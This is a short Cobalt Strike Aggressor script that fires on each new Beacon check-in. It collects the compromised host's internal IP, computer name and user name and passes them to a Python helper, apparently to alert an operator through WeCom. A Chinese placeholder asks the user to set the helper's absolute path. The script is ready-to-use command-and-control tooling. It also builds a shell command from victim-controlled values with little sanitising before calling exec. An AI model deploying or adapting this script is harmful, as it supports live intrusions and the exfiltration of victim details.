on beacon_initial {
	println("Initial Beacon Checkin: " . $1 . " PID: " . beacon_info($1,"pid"));
	local('$internalIP $computerName $userName');
	$internalIP = replace(beacon_info($1,"internal")," ","_");
	$computerName = replace(beacon_info($1,"computer")," ","_");
	$userName = replace(beacon_info($1,"user")," ","_");
	$cmd = 'python3 /改我这里，改我这里，改成绝对路径/cs-wecom.py' . " --computernam " . $computerName . " --internalip " . $internalIP . " --username " . $userName;
	println("Sending server: " . $cmd);
	exec($cmd);
}
